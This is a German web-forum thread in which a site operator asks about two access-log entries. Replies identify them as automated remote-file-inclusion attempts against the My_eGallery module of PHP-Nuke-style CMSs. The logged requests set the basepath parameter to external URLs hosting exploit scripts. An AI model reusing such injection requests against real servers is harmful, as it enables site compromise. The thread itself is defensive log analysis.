Ich hab gerade mal so meine Logs durchgesehen und dabei folgenden Eintrag gefunden.
143.107.21.61 - - [14/Nov/2007:11:51:36 +0100] "GET /modules/My_eGallery/index.php?basepath=http://212.126.26.181/~kamila/exp667.txt? HTTP/1.1" 404 1134
85.119.242.74 - - [14/Nov/2007:11:27:22 +0100] "GET /modules/My_eGallery/index.php?basepath=http://www.displaysakha.ru/education/db?? HTTP/1.1" 404 1134
Kann mir wer sagen was da versucht wurde aufzurufen?
Vielleicht kann mich ja mal wer aufklären.
Gruß Eismann
Also ich habe da nicht viel ahnung von, aber die beiden textinhalte sehen mir nach hackbots aus
http://212.126.26.181/~kamila/exp667.txt
http://www.displaysakha.ru/education/db?
Vielleicht Grasen die so durch das netz und suchen nach angriffbaren Seiten? .... Könnte ich mir vorstellen, aber da wird wahrscheinlich noch jemand fachkundigeres etwas zu sagen können
Die Dateien hab ich mir schon angesehen und vermute das auch.
Ich mach mir da z.Zt. keine großen Sorgen. Die Anfrage wurde ja mit 404 beantwortet.
ABER
Da ich meinen Server gerade neu machen darf nachdem mein phpmyadmin über Tage attakiert und schließlich gehackt wurde, schau ich nun besonders empfindlich auf die Logs.
Die Angriffe auf phpmyadmin sehe ich jetzt zwar immernoch (aber sie laufen jetzt ins Leere) jedoch finde ich zwischendrin immer wieder solche Aufrufe.
Das Modul ist ja Standartmäßig auch im PMX dabei und ich vermute mal es ist gegen solche Angriffe geschützt aber ich dachte mir eine kurze Nachfrage kann nicht schaden.
Gruß Eismann
Moin :)
das sind die üblichen Dumm-Hackversuche zu veralteten phpnuke-Sicherheitslücken...
Hier speziell der: http://www.pragmamx.org/Forum-topic-9178.html